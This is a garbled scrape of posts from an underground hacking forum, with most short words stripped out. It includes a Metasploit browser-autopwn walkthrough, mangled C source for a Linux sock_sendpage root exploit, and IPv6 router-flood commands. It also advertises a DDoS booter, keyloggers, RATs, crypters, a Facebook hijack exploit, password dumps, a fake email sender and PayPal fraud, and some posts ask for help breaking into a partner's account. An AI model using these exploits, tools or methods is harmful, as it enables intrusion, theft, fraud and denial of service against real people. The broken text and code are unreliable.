this simple guide read somebody else facebook messages without any effort will check out cheers mike. 
test and trusted good. 
commented see hidden content. 
unknow unknow romania blacklist yes checked. 
com singapore blacklist checked. 
south carolina united states blacklist yes checked. 
lets just hope works. 
shout need this trick. 
word wait till some popup windows appear cancel popup sign and activate close office and visit crack page given below follow steps given that page that all bit final iso language pack. 
bits final iso language pack. 
note always perform virus scan and download your own risk. 
codefire wrote exploit title cythosia botnet sql injection vulnerability date. 
exploit author galaxyandroid vendor homepage unkn application screenshots version. 
haxor wrote one friend requested crack this shit. 
download link url virus scan result url let see. 
but there lots free image site upload. 
going try and see this works for. 
this could come handy. 
thanks and thx gfgfgfgfgfggfg. 
give some tip abut how sussfly rooted tht server. 
help use netcat root but failed. 
this post gng show hide yur color skype. 
methods how hide your from color skype. 
color use vpn this probably the most secure method. 
you can use free vpn like cyberghost vpn. 
but recommend using paid vpn always ask they keep logs free vpns keep logs. 
there's good guide how select vpn with logs. 
setup proxy skype tools and click the options. 
tab below advanced click connection select the type your proxy put your proxy host and port then click save thats thanx readin this color. 
thanks for the post mate. 
great absolutly amazing king kings. 
don't see nithing virus bro. 
table cheers mike lets see. 
codefire wrote cryptolocker especially insidious form ransomeware malware that was first detected the wild september restricts access infected computers and requires victims pay ransom order regain full access. 
tool created american security expert nick shaw. 
bitdefender anti cryptoblocker that can detect and block malware from installation. 
thank you brahw great one. 
realy now tthnx for sharing. 
how use this tool. 
area still alive anyway let's check out. 
many thanks for this. 
noob omg move trojan out from here. 
gmail cracker lets see working another spam. 
nice work dear bro. 
codefire wrote password list containing passwords and most common used password list thanks for downloads img post longer allowed here the download thank you for sharing. 
doe wrote hawkeye keylogger cracked email ftp php stable stealer binder please note did not crack this. 
thanks man good job. 
thnx bro check out. 
bro keep and make some more stillers. 
lets thx for sharring. 
thanks for sharing this good offer. 
thanks for your good offer. 
this sounds like exactly what need thanks mate. 
windows create proxy socks for windows. 
com windows ssh tunnel. 
ram wrote thank you really good job done you. 
cool thanks for posting. 
worth look for sure. 
codefire wrote i'll try soon can security vulnerability facebook business manager endpoint allows third party application hack any facebook page with limited permissions and the victim will permanently lose admin access the page. 
please inbox link down spyeye. 
pratham wrote idm internet download manager this universal cracker for all idm version. 
universal patch for all versions binternet download manager. 
dude really its very useful info for all hackers and. 
nice bro need this. 
got that from you. 
anyone here tried this exploit newer android like. 
com exploits used the provided and managed sent android test phone which. 
but did not work. 
although managed crash the gallery application with the malicious but couldn sent mms because the limit. 
anyone tried exploit this with another means than mms. 
color ffd what proxy goblin will for you color save working proxies csv text file automatically send the proxies your email autopilot upload fresh proxies your ftp server test the proxies continously and eliminate the bad proxies use proxy goblin plugins and send proxies directly into various softwares tools easily. 
proxy goblin have the ability check google friendly proxies among the good ones make surfing google much safer the top seo software that proxy goblin could send proxies directly are senuke scrapebox scrapeboard sick submitter wpsbox seo link robot and many more url. 
virrc download url url. 
com analysis ebe virus scan url. 
sounds good i'll try later thx. 
thank you will try out now. 
great let try wrote wanna try this. 
thanks for your time and effort bro. 
nice thank you for the info. 
should wait for the third version new features will added. 
can anyone tell what the thread for. 
thanks admin keep cheif. 
bluelupo wrote love this this great. 
uhm it's abit confusing but it's worth trying. 
have interest you can skype bobbybulkeley for fud crypting any form botnet kype bobbybulkeley double your money easily. 
head tail game rules are simple you can win you make the right decision. 
your winnings will paid your perfect money account instantly. 
please let see how this plays outs. 
this post old method must patient proof surveys there optional survey after sign just hit asks for zip why since numbers can changed mixed and used again needs you zipcode confirm your paypal this keylogger rat phish ahead scan flip idc its not. 
sign with paypal that has your phone number. 
wait mins for verification. 
after verifying simply wait and bam your paypal your moneh. 
natwest barclays hsbc santander available. 
thanx for sharing but link dead. 
there any other link. 
org mleri nasibini aldi haber eri sanal alemde belirli izgisi zerinden malar ren imiz nlerde crypter imhatimi gbi hack sitelerinin vip mlerini crackleyen web terrorist grubu seferde ajanlar. 
org'un vipsini crackledi public etti vip inde say zel ara shell siteler cracklenmi scriptler programlar premium yelikler bulunmakta. 
org ghost reconnaissance group lideri rbelaz sald bize kahpelik yapan imhatimi cryptr. 
org lamerlerinden sonra ajanlar. 
org bizden nasibini ald. 
alemde kahpe olan herkes bizden yiyece darbeyi beklesin diye klarken olarak mlere ait ekran leri download linklerini kendi forumlar nda payla. 
ekran leri download linkleri download. 
admin all the email and pass fake decided buy from but they are all dead just send few and let try and promise buy more from cos have search for and now found thanks advance. 
awsome man hope learn something. 
let see let see let see let see let see. 
wrote table width trand wonder hello friends this trick still working dont beleieve look the below trick posted. 
let see this post. 
will take pik now. 
has newer one for. 
com watch wqy zczjm you can check his site out. 
thanks dude for the amazing share. 
thanks for the tutorial hope works. 
thanks for this lovely tool. 
been searching for such. 
lets have look these shall. 
good tutorial thanks you. 
intresting thanks nice sharing. 
payments accepted paypal payza contact only thanks skirby starcraft mofos iknowthatgirl publicpickups wicked twistys babes tiger gracie mofos iknowthatgirl publicpickups jdcohen jdc mofos iknowthatgirl publicpickups ren ren arsis brownhole. 
hope this will work network. 
easy tutorial using theharvester kali linux. 
codefire wrote all the web sites are working fine remove. 
bro this not fake. 
hacked this before months ago can see the mirrors zone bcoz old post and months admin restored his her sites. 
that why all guys think this fake. 
can also deface your country sites. 
but hate cyber war. 
hack windows minutes what you need and what you want. 
chrome firefox any yeye lipssealed smile whistle let's start. 
type startx enter gui mode backtrack. 
type msfconsole victim machine. 
start the victim machine back backtrack. 
type msf use auxiliary server browser autopwn. 
thentype msf show options set lhost means localhost address check localhost terminal and type ifconfig. 
after that you want set srvport which. 
msf set srvport then set uripath. 
msf set uripath now everything done. 
msf exploit run now what need open victim machine. 
open any browser type your backtrack machine's address. 
you don't want open backtrack machine's address you can also with ettercap user open. 
com can also hacked. 
next time can diffidently give tut ettercap. 
after minute you can see our session open open meterprete type msf sessions you like tutorial reply here enjoy. 
pinch glare rolleyes confused blush non. 
you have one for any unix environment becasue prefer unix over windows. 
infact all prefer unix over windows. 
udjgdkhsjsjfj association shzd hsjfdkbfjhfsjf. 
nyc bro let check. 
nice one would take look. 
tnks man need this. 
lets try this out. 
than you much man. 
enjoy download here happy. 
then open reshacker and select ''open'' now select winrar. 
this simple guide read somebody else facebook messages without any effort cheers mike how can't understand. 
let try love joyjeus wrote let try. 
good wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
mkmk wrote droid jack rat. 
trying get i'll into girlfriends facebook account i'm noob this can you help. 
would love see still works. 
dude will please update the link cuz its says this adf. 
its not redirecting the destination page. 
dear can tell how its work its not working how its work and link also not working. 
okay this reply see the post. 
com rrhmz psw vuln. 
gloria wrote how safe this website maybe there someone hack this site and send the passwords. 
url will pay the first person who can this. 
awesome looks nice thnks. 
thanks for the share was very useful page not found bro. 
would like see the content please default facebook application interface not allow third party applications add modify page admin roles page roles like manager editor analyst etc. 
xanagold wrote codefire wrote security vulnerability facebook business manager endpoint allows third party application hack any facebook page with limited permissions and the victim will permanently lose ado would like see content pleaemin access the page. 
this crazy bro thanks lot link not working anymore. 
very good tutorial thank you. 
friends table width free vps code added redeem fast register this site hide. 
gelxw hide code given below. 
crypters crypter zmine cold eal. 
hight life crypter best saintcrackers crypter flycrypter cracked sql tools acunetix web vulnerability scanner. 
the exploit scanner crypters crypter zmine cold eal. 
yeah right many ways share wai. 
great one thanks apreciated good work. 
lets see what this thanks anyways edit link dead. 
have added you skype and here name skyp. 
have manage crack many these passwords myself but theres just way i'm gonna dgd lookin outo them all. 
cheers mike thanks man. 
thanks for the tutorial bro hope works. 
thanks for please you have crypt post. 
thanks very much for this. 
color simple words reverse engineering the act modify the code the application make work our way reverse engineering very complicated topic and very difficult understand for newbie requires prior knowledge assembly language however this article will show you step step how you can crack application with reverse engineering. 
color color requirements color you will require the following things color. 
crack app color now strt sum reverse engineering color. 
once you have downloaded both ollydbg and crack app start the crack app. 
enter any password click. 
you will the following error you are not authorized use the application. 
now open ollydbg and open the crack app. 
now once you have opened the crack app ollydbg right click there and goto search and then click all reference text strings. 
now right click there and click search for text. 
search for the error which you got when you tried log into the application you are not authorized use the application. 
once you have found the error click and you will bought the following screen. 
now you scroll upwards you will find the following line short password. 
this conditional jump which means that the condition right then will jump which leaves the message you are not authorized use the application and the condition not satisfied just continues reading the code don want this jump work don want get the error message color now there are two ways remove this message color. 
can either fill with nop and make this conditional jump not work color color. 
can change short password. 
jne jump not equal means that the password correct will give you the bad message and the password incorrect will give you the correct message color you can use any methods your choice now this tutorial will use the second method use the method follow the steps given below color. 
double click the line short password. 
and simple change jne short password. 
next press the blue play button the top which will start the application. 
now just enter the password and will give you the correct message. 
hope this tutorial will helpful clear the basics reverse engineering and application cracking however the upcoming tutorials will bit advanced. 
color ading this have tried shar wat tht xit knowl. 
thanks man let check cool. 
wrote table width nil cheers mike. 
thanks lot but wondering this exp still working out. 
thanks for the share man'. 
thanks for avance have look. 
please send private message you have the spyeye for sale. 
new forum and want learn about extracting emails from website using sql injection. 
thanks for this share. 
ways spammer and leacher. 
denis yakushko wrote senx comment properly diablo. 
wrote okay lets try this thanks. 
let's test see what results get. 
change color detail nice share dude for. 
keep and hope can have the download link with the source code. 
thanks brother will test soon. 
nice its too damm good thanks bro great tutorials. 
hideman application creates vpn connection one our servers located countries around the world. 
try add new servers fast can. 
vpn connection protects your privacy and increase security level. 
this crack will remove the hour limit hideman letting you connected the vpn server forever how crack install hideman exit from hideman using system tray icon important turn off any virus guards run hideman crack and press crack button asked browse and select hideman. 
exe file from hideman installation path done how fix disconnected issue sometimes you will continuously get disconnected message hideman after applying crack. 
follow the steps given below fix run hideman press button under hours nothing will happen other than loading its payment menu click month option will open web page just close now close hideman completely using system tray icon hideman installation path and delete pref. 
cdat file example path program files hideman bin now open hideman and will work normally this didnt work apply the crack step hideman download. 
com file nfp crack download. 
com file ouvnu video. 
okay i'm gonna check out. 
sites owners removed that files got any problem and check with hidden content you must reply see links. 
bat copy the autorun and launch file your usb hidden content you must reply see links and download the programs named step extract the files you downloaded your desktop and copy all the. 
biokinetix wrote great share huge email password dump sharing with you all huge email and password dump got hands about year ago. 
download dump doawnload this download huge password list for use hash cracker enjoy and please say thanx. 
get here hide reply hide reply password hide reply hide reply tnx for caring sharing. 
all kinds otf proxy. 
codefirenice very useful wrote for password cracking you can choose two different methods. 
nice one there gonna check. 
first download winrar here then install. 
net images smilies pardon. 
gifou cracking tools and them will give you wordlist creator python version. 
coder reiluke scanner results url download url dancing already. 
vbhootna wrote want free vpn that helps downloading torrents bro good. 
this workingw ith android. 
hello all leakforums users today would like share with you first version booter visualbasic for perform ddos attack for free surprised was developed for help the newbie have ddos tools something else there are servers spoofed connected that can generate gbps checked with dstat this program has various attack methods namely tcp spoofed udp spoofed http ovh drop spoofed syn spoofed ack screenshot download link. 
com file kyqbc video. 
com routerpwn web application that aids with the exploitation home routers and other embedded devices. 
compilation local and remote exploits ready run the click button. 
the current release contains exploits which can run locally using the default internal address remotely specifying remote address. 
routerpwn written javascript and html with the purpose being able run most devices. 
has been optimized run mobile devices such smartphones and tablets. 
furthermore has been successfully tested televisions gaming consoles and old cell phones. 
html file which can downloaded and browsed locally exploitation can occur without the need internet connection. 
click search home show off all forums community upgrade vip account search search forum help help documents money make money more more links offensive community xvyctim offensive community hacks exploits and various discussions exploits day facebook account reset hijack session day exploit announcements pretty cool huh share pages previous. 
jump page new reply thread rating vote average thread modes facebook account reset hijack session day exploit phuciuvy offline junior member posts threads joined nov reputation location nam country vietnam money. 
sayagilla offline junior member posts threads joined nov reputation location temanggung country indonesia money. 
donate thanks for sharing. 
roggleif offline junior member posts threads joined dec reputation location scandinavia country norway money. 
donate very nice exploit offline junior member posts threads joined jan reputation location your country morocco money. 
donate prince chaddha wrote facebook account reset hijack session day exploit only for attach config attach nice exploit look khandost offline junior member posts threads joined jan reputation location lahore country pakistan money. 
devonone offline junior member posts threads joined jan reputation location chicago country united states money. 
donate how does this work offline junior member posts threads joined jan reputation location berlin country hungary money. 
donate nice exploit look anagashi offline junior member posts threads joined jan reputation location albania country albania money. 
donate yesterday prince chaddha wrote facebook account reset hijack session day exploit only for attach config attach iiviir sam offline junior member posts threads joined jan reputation location lahore country pakistan money. 
donate hours ago very nice bro thanks for sharingtroll enter keywords search thread pages previous. 
thread author replies views last post session hijacking instagram mobile app via mitm attack day codefire last post stf whmcs day auto exploiter. 
team xploiters codefire last post debasebender hot day adobe flash player exploit bond benz last post debasebender exploit foscam cameras improper access restrictions codefire last post zero. 
code joomla component extention jce day exploit pratham last post vek vulnerability exploit kit preview release privateloader last post how exploit last post local root exploit. 
pratham last post exploit wireless lite adsl modem router model multi exploit pratham last post anniebiafra android remote exploit stagefright anyone last post mathen view printable version send this thread friend subscribe this thread forum jump users browsing this thread xvyctim about offensive community offensive community world best underground hacking forum that provides tutorials latest hacking techniques free tools and great online teaching our members. 
thanks for share with. 
thanks mate i'll take look. 
you sir are hero can not thank you enough. 
payments accepted paypal payza thx men. 
mate great tut can receive link. 
owasp appsec tutorial series episode sql injection the second episode the owasp appsec tutorial series. 
this episode describes the attack the owasp top injection attacks. 
this episode illustrates sql injection discusses other injection attacks covers basic fixes and then recommends resources for further learning. 
stay tune for more tutorials. 
neo video youtube pyptypau. 
com watch pyptypau feature bfa list ulcdbwvewbbxo video. 
the download link broken. 
upload the pictur please. 
thanks man i'll try this. 
tacoz wrote lets see tnx. 
final inno setup unpacker available english and other languages. 
extract data from any inno setup installer and more. 
innoextractor powerful application that helps you unpack inno setup installers using innounp technology. 
with innoextractor you can explore the internal structure and content the installer and you can extract them local folder portable devices without having run the setup download code. 
com for datafilehost uncheck the option use our download manager and get recommended downloads. 
not forget mirror code. 
thanks for upload thank you. 
ilke thnks for this. 
can pls see this. 
thank you men you the best. 
hacker wrote mister illusionist wrote password list containing passwords and most common used password list thanks for downloads img post longer allowed here the download cool bro thax thank you for this. 
thnks lot bro hope the working. 
realy work let try. 
had just started using this the other day and asked for more info about these forums. 
i'm trying figure out how execute local file someones computer via apache server when the victim visits page. 
i've looked into and don't think possible execute file with php javascript server side. 
was thinking about going through ports but have limited knowledge this certain field with tcp connecters and such remotely execute file correct i'm wrong and point the right path. 
avilbot wrote hello india hackers i'm new here and this first post here the latest ferramnetas private hacking enjoy this sharing download and install kins last botnet botnet leaked this private semnana download install and have fun good luck guys thanks rep attach config attach private hacker tools download here good installation thanks bro. 
virus scan burpsuite pro. 
jar ejlidibi xepnt hodbfygjeqaqmg. 
thumbs for you share this best tool. 
that good new way crack idm think all gonna like. 
aint that the truth very fucking careful and those damn anti virus aint gonna help you trust especially coder good like have nice rat thats fud keylogs uploads wallet and all that heavy memory usage and typically hide mine inside the code host program and thats. 
net learn how reverse program try see what does and never mean never run any program outside sandbox will infected its goddamn easy all one has use make get request server that server will logg your and scvrewed people trying get your. 
hope works tnx advance. 
where the website using this videos. 
this looks seriously awesome. 
send the link please. 
thanks bro nice days good job man thanks for this code. 
after reply link showing. 
introduction file upload vulnerability nice tutorial. 
facebook account reset hijack session day exploit only for. 
com exploit description attach config attach. 
awesome thanks for the share man. 
guys this tut rat don't rough summary code downloading config port forwarding set the end lets begin downloading you will need all these download them darkcomet. 
another download incase number doesen't work duc direct download and that's pretty much. 
okay here you are going signup clicky here once that done here and fill out like wrote the image. 
let check think works. 
try this one hehheh. 
thank you much was searching for this. 
thanks for sharing think the promo has ended but let check. 
hello sir give complete tutorial for defacement with shell upload with anonymousity. 
for fucking off pak and china thanking you. 
might want try this one out. 
where the download link thanks bro. 
thanks for this will check out. 
pratham wrote hello ihf know ipv bad the idea behind was good but reality the technology incredibly insecure especially windows machines. 
then enter code wget url download the required package use code rar zfxv thc ipv. 
extract the files then into lastly use code make then code make install that was the hard part believe not from your teminal window type code flood router eth make everything die. 
its very nice program. 
thank you this awesome. 
very much interested this. 
thanks yout sharing hello it's say dont have permission download what should. 
hello friend well will tell how hack the hacker simply say track the hacker here start color many them are affected keylogger torjan and all stroke record and send hacker ftp account gmail account many them like how find the hacker who has install the kelogger his computer color color most hacker use ftp account get key stroke recorded from victim computer like. 
com and many more assume hacker have install key logger now how trace that hacker when the keylogger installed your computer and sending key strokes have log ftp account the hacker has program now thinking how trace here some great tool like wireshark you can download from color url. 
org url wireshark network monitoring tool which monitor what going you network now hacker have install log file your and want hack hacker color open wireshark chose your network and start monitoring your network wireshark will show you you all ftp udp tcp and all type connected your computer color hacker has set particulate time after this particular time key stroke will send his ftp account will maximum min wait min hacker using ftp account filter type ftp and hit enter now you will see that the key loger sending key stroke ftp account and you will see all information even will see the user name and ftp password and many thing else now ftp website open hacker account view his profile and you can also see the other activity done the hacker done thanks for reading the thread hope understood. 
does work for anyone. 
great share mahdii thanks brother. 
bond benz wrote rdp cracker included with user and password list download man. 
will check and confirm this still works after yrs posting. 
does this really work egyptian security researcher yasser. 
i've heard conflicting opinions whether android rats work not. 
i'm looking for one can send remotely through and email text something. 
any pros have any insight these thanks. 
does this still work anyone. 
penis cunt cock want this. 
think its not possible but take chance. 
thank very much thank very much. 
sweet thanks lot for this. 
malord wrote bond benz wrote free working php script check valid emails and registred with paypal. 
screenshoot download work not. 
wanted from last month. 
thanks for this this good. 
thankz bro and let see working. 
merci l'amis vais tester programme. 
this must good have. 
wow looks very much helpful. 
does this still work cause it's old method and paypal are always updating things sent from iphone using tapatalk. 
hope this works thanks. 
thank you for the pack. 
now the link works. 
thanks new and got problem acess own networks due passwords. 
nice app bro def gonna try out. 
will check out bro thanks. 
sdfsdfnh fgdgevg rhfferf gff. 
let check out the content. 
spyhunter crack registration key download free spyhunter crack registration key seriously hit that button that's motivating factor click download above this text for download program you want. 
spyhunter powerful real time anti spyware application certified west coast labs checkmark certification system and designed assist the average computer user protecting their from malicious threats. 
spyhunter automatically configured give you optimal protection with limited interaction all you need install for immediate and ongoing protection. 
malware continues evolve and become more sophisticated avoid detection anti spyware anti virus programs spyhunter responds with advanced technology stay one step ahead today malware threats. 
spyhunter offers additional customization capabilities ensure every user able custom tailor spyhunter fit their specific needs. 
spyhunter has the ability detect and remove rootkits which are used stealth install rogue anti spyware programs and other trojans. 
rootkits use hidden and encrypted files and folders avoid detection traditional security software. 
spyhunter newly integrated advanced rootkit detection technology allows perform instant rootkit scan and promptly display message upon detection. 
spyhunter will then ask the user reboot the computer and will remove the rootkit during the reboot process. 
order remove rootkits completely windows must stopped upon boot because rootkits utilize other files that load and run with windows. 
therefore prevent rootkits from regenerating user computer added compact into spyhunter that allows your system booted without windows that the rootkit may removed from your computer. 
spyhunter not able automatically remove malware object the spyware helpdesk interactive feature integrated into spyhunter allows our technicians remotely analyze your machine and directly deliver custom fix specific malware problems that may unique your computer. 
thanks soo much buddy for this share. 
new here someone show around. 
looks amazing thanks for sharing. 
connect with part finish logout thanks dude very nice post. 
for find websites what should for exaple how can see should use jce exploit. 
thanks man and hope that will work. 
thank you for share bro. 
mattzleak wrote hello all leakforums users today would like share with you first version booter visualbasic for perform ddos attack for free surprised was developed for help the newbie have ddos tools something else there are servers spoofed connected that can generate gbps checked with dstat this program has various attack methods namely tcp spoofed udp spoofed http ovh drop spoofed syn spoofed ack screenshot download link video. 
hello guys here back with new crack. 
attach config attach download click here thank you. 
thnk you for sharing. 
add save and load own dorks now download hidden content you must reply see links. 
this quite complicated hope can use. 
want patch edit plus. 
way need set reply. 
anyone test this looks sus. 
really thank you man. 
hope that this work whit. 
thano you very much for the class. 
hopefully will work isn't useless. 
thanks for the program. 
i'd like the show off today. 
linux sock sendpage null pointer dereference copyright ramon carvalho valle. 
org this program free software you can redistribute and modify under the terms the gnu general public license published the free software foundation either version the license your option any later version. 
this program distributed the hope that will useful but without any warranty without even the implied warranty fitness for particular purpose. 
see the gnu general public license for more details. 
you should have received copy the gnu general public license along with this program not write the free software foundation inc. 
franklin street fifth floor boston usa this exploit was written illustrate the exploitability this vulnerability discovered tavis ormandy and julien tinnes ppc and ppc. 
this exploit makes use the selinux and the mmap min addr problem exploit this vulnerability red hat enterprise linux. 
the problem first noticed brad spengler was described red hat red hat knowledgebase article security enhanced linux selinux policy and the mmap min addr protection. 
support for and was added for completeness. 
for more complete implementation refer brad spengler's exploit which also implements the personality trick published tavis ormandy and julien tinnes. 
linux kernel versions from. 
this exploit was tested centos. 
red hat enterprise linux. 
not vulnerable red hat enterprise linux. 
suse linux enterprise server. 
for and ppc compile with the following command gcc wall linux sendpage linux sendpage. 
and for and ppc gcc wall linux sendpage linux sendpage. 
com faq docs doc. 
defined always inline define always inline inline attribute always inline endif defined defined defined static always inline unsigned long current stack pointer void unsigned long asm volatile movq rsp return else static always inline unsigned long current stack pointer void unsigned long asm volatile movl esp return endif elif defined powerpc defined powerpc static always inline unsigned long current stack pointer void unsigned long asm volatile return endif defined defined defined static always inline unsigned long current task struct void unsigned long task struct asm volatile movq task struct return task struct else define task running static always inline unsigned long current task struct void unsigned long task struct thread info thread info current stack pointer unsigned long thread info task struct unsigned long thread info the task running the only possible state for process executing user space. 
unsigned long task struct task running return task struct prior the. 
kernel series the task struct was stored the end the kernel stack. 
task struct current stack pointer unsigned long task struct task running return task struct thread info task struct task struct unsigned long thread info unsigned long task struct task running return task struct return endif elif defined powerpc defined powerpc define task running static always inline unsigned long current task struct void unsigned long task struct thread info defined task struct current stack pointer else task struct current stack pointer endif unsigned long task struct task running return task struct thread info task struct task struct unsigned long thread info unsigned long task struct task running return task struct return endif defined defined static unsigned long uid gid static int change cred void unsigned int task struct task struct unsigned int current task struct while task struct task struct uid task struct uid task struct uid task struct uid task struct gid task struct gid task struct gid task struct gid task struct task struct task struct task struct task struct task struct task struct task struct break task struct return elif defined powerpc defined powerpc static int change cred void unsigned int task struct task struct unsigned int current task struct while task struct task struct task struct continue task struct task struct task struct task struct task struct task struct task struct task struct task struct task struct task struct task struct task struct task struct task struct task struct task struct task struct task struct task struct break task struct return endif define page size getpagesize int main void char addr int out char template tmp tmp. 
defined defined uid getuid gid getgid endif addr mmap null prot exec prot read prot write map fixed map private map anonymous map failed perror mmap exit exit failure defined defined defined addr xff' addr addr unsigned long addr unsigned long addr unsigned long change cred else addr xff' addr unsigned long addr unsigned long addr unsigned long change cred endif elif defined powerpc defined powerpc defined the use function descriptors the power bit elf abi requires the use fake function descriptor. 
unsigned long addr unsigned long change cred else addr addr unsigned short addr unsigned short change cred addr addr xff' unsigned short addr unsigned short change cred addr addr addr addr addr addr addr addr endif endif out socket bluetooth sock dgram perror socket exit exit failure mkstemp template perror mkstemp exit exit failure unlink template perror unlink exit exit failure ftruncate page size perror ftruncate exit exit failure sendfile out null page size execl bin null exit exit success. 
prince chaddha wrote facebook account reset hijack session day exploit only for attach config attach will tested. 
cheers mike wanna see the trick. 
has anyone had any joy. 
ill give thanks man. 
nice post have little big tha mine. 
nice tool easy use. 
owasp appsec tutorial series episode appsec basics the first episode the owasp appsec tutorial series. 
this episode describes what the series going cover why vital learn about application security and what expect upcoming episodes. 
stay tune for more. 
neo video youtube cdbwvewbbxo. 
com watch cdbwvewbbxo feature bfa list rqsnf video. 
killzone wrote could get that download link now now read thread. 
you will get the download link. 
after replying you can see link. 
thanks you good job. 
believe you and thnk for leak. 
thanks bro let see. 
erenee ree egegeegergege egegereg. 
thanks will get test. 
best hacking android like this site. 
thz for sharing guy. 
cool stuff dude thanks. 
bhai issma mana files creat kiye and mera pass webhosting ussma mana files upload bhi kar without any changes abb kay karna. 
swapnil haxor wrote cyber ghost vpn about cyber ghost cyberghost important tool for protecting your privacy. 
connect the service you want mirror link pass swapnilhaxor enjoy with ihf. 
i'll try and tell weather works not. 
it's very interesting method. 
now i'm gonna show you how send fake email with any email domain you want here first download the program updated version hide reply url. 
com file ewj evbq bti fake email sender. 
html download here url hide reply virustotal after downloading the program run and the program looks like this now fill all text field the application note click view after you fill all textfields then click send email button and wait till you got message box. 
lets give try thanks anyway. 
all you guys are aware nmap network mapping. 
very famous port scanner available for free. 
not just only port scanner also various jobs like banner grabbing fingerprinting run scripts etc. 
i'm gonna show you some important commands nmap. 
requisites nmap step open the console and type nmap will give you the whole commands nmap. 
but are here understanding the commands should ahead. 
here the cheatsheet nmap. 
basic scanning techniques table goal command example scan single target nmap target nmap. 
scan multiple targets nmap target target etc nmap. 
scan list targets nmap list. 
txt scan range hosts nmap range addresses nmap. 
scan entire subnet nmap address cdir nmap. 
scan random hosts nmap number nmap excluding targets from scan nmap targets exclude targets nmap. 
excluding targets using list nmap targets excludefile list. 
txt perform aggressive scan nmap target nmap. 
scan ipv target nmap target nmap aff afe table discovery options table goal command example perform ping only scan nmap target nmap. 
don ping nmap target nmap. 
tcp syn ping nmap target nmap. 
tcp ack ping nmap target nmap. 
udp ping nmap target nmap. 
sctp init ping nmap target nmap. 
icmp echo ping nmap target nmap. 
icmp timestamp ping nmap target nmap. 
icmp address mask ping nmap target nmap. 
protocol ping nmap target nmap. 
arp ping nmap target nmap. 
traceroute nmap traceroute target nmap traceroute. 
force reverse dns resolution nmap target nmap. 
disable reverse dns resolution nmap target nmap. 
alternative dns lookup nmap system dns target nmap system dns. 
manually specify dns server nmap dns servers servers target nmap dns servers. 
create host list nmap targets nmap. 
table advanced scanning options table goal command example tcp syn scan nmap target nmap. 
tcp connect scan nmap target nmap. 
udp scan nmap target nmap. 
tcp null scan nmap target nmap. 
tcp fin scan nmap target nmap. 
xmas scan nmap target nmap. 
tcp ack scan nmap target nmap. 
custom tcp scan nmap scanflags flags target nmap scanflags synfin. 
protocol scan nmap target nmap. 
send raw ethernet packets nmap send eth target nmap send eth. 
send packets nmap send target nmap send. 
table port scanning options table goal command example perform fast scan nmap target nmap. 
scan specific ports nmap port target nmap. 
scan ports name nmap port name target nmap ftp. 
scan ports protocol nmap ports ports target nmap. 
scan all ports nmap target nmap. 
scan top ports nmap top ports number target nmap top ports. 
perform sequential port scan nmap target nmap. 
table version detection table goal command example operating system detection nmap target nmap. 
org submit attempt guess unknown nmap osscan guess target nmap osscan guess. 
service version detection nmap target nmap. 
version scans nmap version trace target nmap version trace. 
perform rpc scan nmap target nmap. 
table timing options table goal command example timing templates nmap target nmap. 
set the packet ttl nmap ttl time target nmap ttl. 
minimum parallel operations nmap min parallelism number target nmap min parallelism. 
maximum parallel operations nmap max parallelism number target nmap max parallelism. 
minimum host group size nmap min hostgroup number targets nmap min hostgroup. 
maximum host group size nmap max hostgroup number targets nmap max hostgroup. 
maximum rtt timeout nmap initial rtt timeout time target nmap initial rtt timeout. 
initial rtt timeout nmap max rtt timeout ttl target nmap max rtt timeout. 
maximum retries nmap max retries number target nmap max retries. 
host timeout nmap host timeout time target nmap host timeout. 
minimum scan delay nmap scan delay time target nmap scan delay. 
maximum scan delay nmap max scan delay time target nmap max scan delay. 
minimum packet rate nmap min rate number target nmap min rate. 
maximum packet rate nmap max rate number target nmap max rate. 
defeat reset rate limits nmap defeat rst ratelimit target nmap defeat rst ratelimit. 
table firewall evasion techniques table goal command example fragment packets nmap target nmap. 
specify specific mtu nmap mtu mtu target nmap mtu. 
use decoy nmap rnd number target nmap rnd. 
idle zombie scan nmap zombie target nmap. 
manually specify source port nmap source port port target nmap source port. 
append random data nmap data length size target nmap data length. 
randomize target scan order nmap randomize hosts target nmap randomize hosts. 
spoof mac address nmap spoof mac mac vendor target nmap spoof mac cisco. 
send bad checksums nmap badsum target nmap badsum. 
table output options table goal command example save output text file nmap scan. 
txt target nmap scan. 
save output xml file nmap scan. 
xml target nmap scan. 
grepable output nmap scan. 
txt targets nmap scan. 
output all supported file types nmap path filename target nmap. 
periodically display statistics nmap stats every time target nmap stats every. 
table and debugging table goal command example getting help nmap nmap display nmap version nmap nmap verbose output nmap target nmap. 
debugging nmap target nmap. 
display port state reason nmap reason target nmap reason. 
only display open ports nmap open target nmap open. 
trace packets nmap packet trace target nmap packet trace. 
display host networking nmap iflist nmap iflist specify network interface nmap interface target nmap eth. 
table nmap scripting engine table goal command example execute individual scripts nmap script script. 
nse target nmap script banner. 
execute multiple scripts nmap script expression target nmap script. 
script categories all auth default discovery external intrusive malware safe vuln execute scripts category nmap script category target nmap script 'not intrusive'. 
execute multiple script categories nmap script category category etc nmap script 'default safe'. 
troubleshoot scripts nmap script script script trace target nmap script banner. 
update the script database nmap script updatedb nmap script updatedb table thank you all for reading the post. 
let's see how works out the link not working. 
com groups good tutorial. 
lets have look see. 
net wiki main page table main window about bootloader configuration general settings setting password for volume encryption image file encryption table. 
reproduce this issue this. 
filters date search term trolololo guilty variable 'search app filters' which wait receive doubled array forums sortkey. 
normal request would looks like this. 
filters forums sortkey date search term trolololo how secure open your cpanel open file manager open forum root folder make new file php. 
cheers mike replying see content. 
really nice thanks lot. 
let try this was seachiong for this from long time and looks like its lucky day finally found. 
how setup your own proxy server for free simple google search like proxy servers and you find dozens php proxy scripts the internet that will help you create proxy servers minutes for free. 
create free proxy server with google app engine here one such proxy site that you can build for your friends china even for your personal use say for accessing blocked sites from office. 
com and sign using your google account. 
step once python installed code. 
com download the google app engine sdk for python and install. 
step download this zip file and extract some folder your desktop. 
update credits the proxy server uses code from mirrorr open source web caching project brett slatkin. 
verifying see this works currently. 
nice too bad linux. 
thanks the link the other thread was wrond lets try this. 
tnks brow nice tutorial. 
connect with facebook hidden content you must reply see links skype iam thegame logout neo hidden content you must reply see links code. 
nice nice but does work. 
this simple guide read somebody else facebook messages without any effort cheers mike let see how works. 
net forum rat url post thread pay with any payment method other than paypal. 
wow tthast great fun. 
this looks awsome thank you sir this looks just damn awsome thanks bro cyber warrior wrote features fully undetected batch code easy setup works with windows vista runs silently the background copies files fast servers trace left process shown makes beep sound once when finished steals text messages iphone backup system info processes running favorites documents pictures videos. 
cheers mike let's see. 
there websites protect html code and obfuscate such. 
great tutorial need thanks. 
trillium security multisploit tool cracked options. 
chm help file download execute exploits. 
vbs visual basic script download execute exploits. 
